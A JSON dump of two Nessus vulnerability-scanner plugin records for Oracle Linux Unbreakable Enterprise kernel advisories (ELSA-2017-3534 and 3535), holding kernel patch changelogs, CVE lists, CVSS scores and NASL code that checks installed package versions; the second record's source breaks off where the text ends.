{"nessus": [{"lastseen": "2021-01-17T12:51:57", "description": "Description of changes:\n\n[3.8.13-118.17.4.el7uek]\n- Revert 'fix minor infoleak in get_user_ex()' (Brian Maly) [Orabug: \n25790392] {CVE-2016-9644}\n\n[3.8.13-118.17.3.el7uek]\n- net: ping: check minimum size on ICMP header length (Kees Cook) \n[Orabug: 25766911] {CVE-2016-8399}\n\n[3.8.13-118.17.2.el7uek]\n- ipv6: stop sending PTB packets for MTU < 1280 (Hagen Paul Pfeifer) \n[Orabug: 25765776] {CVE-2016-10142}\n- sg_write()/bsg_write() is not fit to be called under KERNEL_DS (Al \nViro) [Orabug: 25765445] {CVE-2016-10088}\n- scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) \n[Orabug: 25751996] {CVE-2017-7187}\n\n[3.8.13-118.17.1.el7uek]\n- tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: \n25696686] {CVE-2017-2636}\n- TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: \n25696686] {CVE-2017-2636}\n- drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc (Fabian \nFrederick) [Orabug: 25696686] {CVE-2017-2636}\n- x86: bpf_jit: fix compilation of large bpf programs (Alexei \nStarovoitov) [Orabug: 21305080] {CVE-2015-4700}\n- net: filter: return -EINVAL if BPF_S_ANC* operation is not supported \n(Daniel Borkmann) [Orabug: 22187148] - KEYS: request_key() should reget \nexpired keys rather than give EKEYEXPIRED (David Howells) - KEYS: \nIncrease root_maxkeys and root_maxbytes sizes (Steve Dickson) - \nfirewire: net: guard against rx buffer overflows (Stefan Richter) \n[Orabug: 25451530] {CVE-2016-8633}\n- x86/mm/32: Enable full randomization on i386 and X86_32 (Hector \nMarco-Gisbert) [Orabug: 25463927] {CVE-2016-3672}\n- x86 get_unmapped_area: Access mmap_legacy_base through mm_struct \nmember (Radu Caragea) [Orabug: 25463927] {CVE-2016-3672}\n- pptp: verify sockaddr_len in pptp_bind() and pptp_connect() (WANG \nCong) [Orabug: 25490335] {CVE-2015-8569}\n- sg_start_req(): make sure that there's not too many elements in iovec \n(Al Viro) [Orabug: 25490372] {CVE-2015-5707}\n- kvm: nVMX: Allow L1 to intercept software exceptions (#BP and #OF) \n(Jim Mattson) [Orabug: 25507195] {CVE-2016-9588}\n- tcp: take care of truncations done by sk_filter() (Eric Dumazet) \n[Orabug: 25507230] {CVE-2016-8645}\n- rose: limit sk_filter trim to payload (Willem de Bruijn) [Orabug: \n25507230] {CVE-2016-8645}\n- fix minor infoleak in get_user_ex() (Al Viro) [Orabug: 25507281] \n{CVE-2016-9178}\n- scsi: arcmsr: Simplify user_len checking (Borislav Petkov) [Orabug: \n25507328] {CVE-2016-7425}\n- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() (Dan \nCarpenter) [Orabug: 25507328] {CVE-2016-7425}\n- net: fix a kernel infoleak in x25 module (Kangjie Lu) [Orabug: \n25512413] {CVE-2016-4580}\n- USB: digi_acceleport: do sanity checking for the number of ports \n(Oliver Neukum) [Orabug: 25512471] {CVE-2016-3140}\n- ipv4: keep skb->dst around in presence of IP options (Eric Dumazet) \n[Orabug: 25543892] {CVE-2017-5970}\n- net/llc: avoid BUG_ON() in skb_orphan() (Eric Dumazet) [Orabug: \n25682430] {CVE-2017-6345}\n- dccp: fix freeing skb too early for IPV6_RECVPKTINFO (Andrey \nKonovalov) {CVE-2017-6074}\n- crypto: algif_hash - Only export and import on sockets with data \n(Herbert Xu) [Orabug: 25417805] {CVE-2016-8646}\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: \n25462760] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462807] {CVE-2016-4485}\n- af_unix: Guard against other == sk in unix_dgram_sendmsg (Rainer \nWeikusat) [Orabug: 25463996] {CVE-2013-7446}\n- unix: avoid use-after-free in ep_remove_wait_queue (Rainer Weikusat) \n[Orabug: 25463996] {CVE-2013-7446}\n- net: avoid signed overflows for SO_{SND|RCV}BUFFORCE (Eric Dumazet) \n[Orabug: 25203623] {CVE-2016-9793}", "edition": 25, "cvss3": {"score": 8.6, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2017-04-03T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3534)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8633", "CVE-2017-6074", "CVE-2016-8399", "CVE-2016-9793", "CVE-2016-10088", "CVE-2017-5970", "CVE-2017-2636", "CVE-2016-9178", "CVE-2016-7425", "CVE-2016-4485", "CVE-2016-4482", "CVE-2017-6345", "CVE-2016-8646", "CVE-2016-9588", "CVE-2016-3140", "CVE-2013-7446", "CVE-2017-7187", "CVE-2015-8569", "CVE-2016-10142", "CVE-2016-9644", "CVE-2015-5707", "CVE-2016-4580", "CVE-2016-3672", "CVE-2016-8645", "CVE-2015-4700"], "modified": "2017-04-03T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.17.4.el6uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.17.4.el7uek", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2017-3534.NASL", "href": "https://www.tenable.com/plugins/nessus/99160", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3534.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99160);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2015-4700\", \"CVE-2015-5707\", \"CVE-2015-8569\", \"CVE-2016-10088\", \"CVE-2016-10142\", \"CVE-2016-3140\", \"CVE-2016-3672\", \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-4580\", \"CVE-2016-7425\", \"CVE-2016-8399\", \"CVE-2016-8633\", \"CVE-2016-8645\", \"CVE-2016-8646\", \"CVE-2016-9178\", \"CVE-2016-9588\", \"CVE-2016-9644\", \"CVE-2016-9793\", \"CVE-2017-2636\", \"CVE-2017-5970\", \"CVE-2017-6074\", \"CVE-2017-6345\", \"CVE-2017-7187\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2017-3534)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Description of changes:\n\n[3.8.13-118.17.4.el7uek]\n- Revert 'fix minor infoleak in get_user_ex()' (Brian Maly) [Orabug: \n25790392] {CVE-2016-9644}\n\n[3.8.13-118.17.3.el7uek]\n- net: ping: check minimum size on ICMP header length (Kees Cook) \n[Orabug: 25766911] {CVE-2016-8399}\n\n[3.8.13-118.17.2.el7uek]\n- ipv6: stop sending PTB packets for MTU < 1280 (Hagen Paul Pfeifer) \n[Orabug: 25765776] {CVE-2016-10142}\n- sg_write()/bsg_write() is not fit to be called under KERNEL_DS (Al \nViro) [Orabug: 25765445] {CVE-2016-10088}\n- scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) \n[Orabug: 25751996] {CVE-2017-7187}\n\n[3.8.13-118.17.1.el7uek]\n- tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: \n25696686] {CVE-2017-2636}\n- TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: \n25696686] {CVE-2017-2636}\n- drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc (Fabian \nFrederick) [Orabug: 25696686] {CVE-2017-2636}\n- x86: bpf_jit: fix compilation of large bpf programs (Alexei \nStarovoitov) [Orabug: 21305080] {CVE-2015-4700}\n- net: filter: return -EINVAL if BPF_S_ANC* operation is not supported \n(Daniel Borkmann) [Orabug: 22187148] - KEYS: request_key() should reget \nexpired keys rather than give EKEYEXPIRED (David Howells) - KEYS: \nIncrease root_maxkeys and root_maxbytes sizes (Steve Dickson) - \nfirewire: net: guard against rx buffer overflows (Stefan Richter) \n[Orabug: 25451530] {CVE-2016-8633}\n- x86/mm/32: Enable full randomization on i386 and X86_32 (Hector \nMarco-Gisbert) [Orabug: 25463927] {CVE-2016-3672}\n- x86 get_unmapped_area: Access mmap_legacy_base through mm_struct \nmember (Radu Caragea) [Orabug: 25463927] {CVE-2016-3672}\n- pptp: verify sockaddr_len in pptp_bind() and pptp_connect() (WANG \nCong) [Orabug: 25490335] {CVE-2015-8569}\n- sg_start_req(): make sure that there's not too many elements in iovec \n(Al Viro) [Orabug: 25490372] {CVE-2015-5707}\n- kvm: nVMX: Allow L1 to intercept software exceptions (#BP and #OF) \n(Jim Mattson) [Orabug: 25507195] {CVE-2016-9588}\n- tcp: take care of truncations done by sk_filter() (Eric Dumazet) \n[Orabug: 25507230] {CVE-2016-8645}\n- rose: limit sk_filter trim to payload (Willem de Bruijn) [Orabug: \n25507230] {CVE-2016-8645}\n- fix minor infoleak in get_user_ex() (Al Viro) [Orabug: 25507281] \n{CVE-2016-9178}\n- scsi: arcmsr: Simplify user_len checking (Borislav Petkov) [Orabug: \n25507328] {CVE-2016-7425}\n- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() (Dan \nCarpenter) [Orabug: 25507328] {CVE-2016-7425}\n- net: fix a kernel infoleak in x25 module (Kangjie Lu) [Orabug: \n25512413] {CVE-2016-4580}\n- USB: digi_acceleport: do sanity checking for the number of ports \n(Oliver Neukum) [Orabug: 25512471] {CVE-2016-3140}\n- ipv4: keep skb->dst around in presence of IP options (Eric Dumazet) \n[Orabug: 25543892] {CVE-2017-5970}\n- net/llc: avoid BUG_ON() in skb_orphan() (Eric Dumazet) [Orabug: \n25682430] {CVE-2017-6345}\n- dccp: fix freeing skb too early for IPV6_RECVPKTINFO (Andrey \nKonovalov) {CVE-2017-6074}\n- crypto: algif_hash - Only export and import on sockets with data \n(Herbert Xu) [Orabug: 25417805] {CVE-2016-8646}\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: \n25462760] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462807] {CVE-2016-4485}\n- af_unix: Guard against other == sk in unix_dgram_sendmsg (Rainer \nWeikusat) [Orabug: 25463996] {CVE-2013-7446}\n- unix: avoid use-after-free in ep_remove_wait_queue (Rainer Weikusat) \n[Orabug: 25463996] {CVE-2013-7446}\n- net: avoid signed overflows for SO_{SND|RCV}BUFFORCE (Eric Dumazet) \n[Orabug: 25203623] {CVE-2016-9793}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-April/006817.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-April/006818.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.17.4.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.17.4.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-7446\", \"CVE-2015-4700\", \"CVE-2015-5707\", \"CVE-2015-8569\", \"CVE-2016-10088\", \"CVE-2016-10142\", \"CVE-2016-3140\", \"CVE-2016-3672\", \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-4580\", \"CVE-2016-7425\", \"CVE-2016-8399\", \"CVE-2016-8633\", \"CVE-2016-8645\", \"CVE-2016-8646\", \"CVE-2016-9178\", \"CVE-2016-9588\", \"CVE-2016-9644\", \"CVE-2016-9793\", \"CVE-2017-2636\", \"CVE-2017-5970\", \"CVE-2017-6074\", \"CVE-2017-6345\", \"CVE-2017-7187\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3534\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.17.4.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.17.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.17.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.17.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.17.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.17.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.17.4.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.17.4.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.17.4.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.17.4.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.17.4.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.17.4.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.17.4.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.17.4.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:57", "description": "Description of changes:\n\n[2.6.39-400.294.6.el6uek]\n- RHEL: complement upstream workaround for CVE-2016-10142. (Quentin \nCasasnovas) [Orabug: 25765786] {CVE-2016-10142} {CVE-2016-10142}\n\n[2.6.39-400.294.5.el6uek]\n- net: ping: check minimum size on ICMP header length (Kees Cook) \n[Orabug: 25766914] {CVE-2016-8399}\n- ipv6: stop sending PTB packets for MTU < 1280 (Hagen Paul Pfeifer) \n[Orabug: 25765786] {CVE-2016-10142}\n- sg_write()/bsg_write() is not fit to be called under KERNEL_DS (Al \nViro) [Orabug: 25765448] {CVE-2016-10088}\n- scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) \n[Orabug: 25752011] {CVE-2017-7187}\n\n[2.6.39-400.294.4.el6uek]\n- tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: \n25696689] {CVE-2017-2636}\n- TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: \n25696689] {CVE-2017-2636}\n- drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc (Fabian \nFrederick) [Orabug: 25696689] {CVE-2017-2636}\n- list: introduce list_first_entry_or_null (Jiri Pirko) [Orabug: \n25696689] {CVE-2017-2636}\n- firewire: net: guard against rx buffer overflows (Stefan Richter) \n[Orabug: 25451538] {CVE-2016-8633}\n- x86/mm/32: Enable full randomization on i386 and X86_32 (Hector \nMarco-Gisbert) [Orabug: 25463929] {CVE-2016-3672}\n- x86 get_unmapped_area: Access mmap_legacy_base through mm_struct \nmember (Radu Caragea) [Orabug: 25463929] {CVE-2016-3672}\n- sg_start_req(): make sure that there's not too many elements in iovec \n(Al Viro) [Orabug: 25490377] {CVE-2015-5707}\n- tcp: take care of truncations done by sk_filter() (Eric Dumazet) \n[Orabug: 25507232] {CVE-2016-8645}\n- rose: limit sk_filter trim to payload (Willem de Bruijn) [Orabug: \n25507232] {CVE-2016-8645}\n- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() (Dan \nCarpenter) [Orabug: 25507330] {CVE-2016-7425}\n- x86: bpf_jit: fix compilation of large bpf programs (Alexei \nStarovoitov) [Orabug: 25507375] {CVE-2015-4700}\n- net: fix a kernel infoleak in x25 module (Kangjie Lu) [Orabug: \n25512417] {CVE-2016-4580}\n- USB: digi_acceleport: do sanity checking for the number of ports \n(Oliver Neukum) [Orabug: 25512472] {CVE-2016-3140}\n- net/llc: avoid BUG_ON() in skb_orphan() (Eric Dumazet) [Orabug: \n25682437] {CVE-2017-6345}", "edition": 29, "cvss3": {"score": 8.6, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2017-04-03T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3535)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8633", "CVE-2016-8399", "CVE-2016-10088", "CVE-2017-2636", "CVE-2016-7425", "CVE-2017-6345", "CVE-2016-3140", "CVE-2017-7187", "CVE-2016-10142", "CVE-2015-5707", "CVE-2016-4580", "CVE-2016-3672", "CVE-2016-8645", "CVE-2015-4700"], "modified": "2017-04-03T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2017-3535.NASL", "href": "https://www.tenable.com/plugins/nessus/99161", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3535.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99161);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-4700\", \"CVE-2015-5707\", \"CVE-2016-10088\", \"CVE-2016-10142\", \"CVE-2016-3140\", \"CVE-2016-3672\", \"CVE-2016-4580\", \"CVE-2016-7425\", \"CVE-2016-8399\", \"CVE-2016-8633\", \"CVE-2016-8645\", \"CVE-2017-2636\", \"CVE-2017-6345\", \"CVE-2017-7187\");\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3535)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.294.6.el6uek]\n- RHEL: complement upstream workaround for CVE-2016-10142. (Quentin \nCasasnovas) [Orabug: 25765786] {CVE-2016-10142} {CVE-2016-10142}\n\n[2.6.39-400.294.5.el6uek]\n- net: ping: check minimum size on ICMP header length (Kees Cook) \n[Orabug: 25766914] {CVE-2016-8399}\n- ipv6: stop sending PTB packets for MTU < 1280 (Hagen Paul Pfeifer) \n[Orabug: 25765786] {CVE-2016-10142}\n- sg_write()/bsg_write() is not fit to be called under KERNEL_DS (Al \nViro) [Orabug: 25765448] {CVE-2016-10088}\n- scsi: sg: check length passed to SG_NEXT_CMD_LEN (peter chang) \n[Orabug: 25752011] {CVE-2017-7187}\n\n[2.6.39-400.294.4.el6uek]\n- tty: n_hdlc: get rid of racy n_hdlc.tbuf (Alexander Popov) [Orabug: \n25696689] {CVE-2017-2636}\n- TTY: n_hdlc, fix lockdep false positive (Jiri Slaby) [Orabug: \n25696689] {CVE-2017-2636}\n- drivers/tty/n_hdlc.c: replace kmalloc/memset by kzalloc (Fabian \nFrederick) [Orabug: 25696689] {CVE-2017-2636}\n- list: introduce list_first_entry_or_null (Jiri Pirko) [Orabug: \n25696689] {CVE-2017-2636}\n- firewire: net: guard against rx buffer overflows (Stefan Richter) \n[Orabug: 25451538] {CVE-2016-8633}\n- x86/mm/32: Enable full randomization on i386 and X86_32 (Hector \nMarco-Gisbert) [Orabug: 25463929] {CVE-2016-3672}\n- x86 get_unmapped_area: Access mmap_legacy_base through mm_struct \nmember (Radu Caragea) [Orabug: 25463929] {CVE-2016-3672}\n- sg_start_req(): make sure that there's not too many elements in iovec \n(Al Viro) [Orabug: 25490377] {CVE-2015-5707}\n- tcp: take care of truncations done by sk_filter() (Eric Dumazet) \n[Orabug: 25507232] {CVE-2016-8645}\n- rose: limit sk_filter trim to payload (Willem de Bruijn) [Orabug: \n25507232] {CVE-2016-8645}\n- scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() (Dan \nCarpenter) [Orabug: 25507330] {CVE-2016-7425}\n- x86: bpf_jit: fix compilation of large bpf programs (Alexei \nStarovoitov) [Orabug: 25507375] {CVE-2015-4700}\n- net: fix a kernel infoleak in x25 module (Kangjie Lu) [Orabug: \n25512417] {CVE-2016-4580}\n- USB: digi_acceleport: do sanity checking for the number of ports \n(Oliver Neukum) [Orabug: 25512472] {CVE-2016-3140}\n- net/llc: avoid BUG_ON() in skb_orphan() (Eric Dumazet) [Orabug: \n25682437] {CVE-2017-6345}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-April/006819.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate 